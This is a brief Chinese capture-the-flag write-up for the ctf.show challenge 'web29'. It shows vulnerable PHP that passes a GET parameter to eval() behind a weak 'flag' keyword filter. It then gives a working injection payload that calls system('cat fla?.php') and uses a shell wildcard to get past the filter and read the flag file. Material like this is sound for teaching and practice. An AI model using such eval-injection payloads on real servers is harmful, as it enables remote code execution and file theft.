web29

代码审计嘛

<?php



/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-09-04 00:12:34

# @Last Modified by:   h1xa

# @Last Modified time: 2020-09-04 00:26:48

# @email: h1xa@ctfer.com

# @link: https://ctfer.com



*/



error_reporting(0);

if(isset($_GET['c'])){

    $c = $_GET['c'];

    if(!preg_match("/flag/i", $c)){

        eval($c);

    }

    

}else{

    highlight_file(__FILE__);

}

就过滤了一个flag，简单

payload：

http://7739c9b6-32d1-4535-b359-a1e191234215.challenge.ctf.show/?c=system('cat fla?.php');
// 这里涉及的知识点是bash的通配符，问好 ? 代表一个任意字符，星号 * 代表任意数量个任意字符

flag在注释里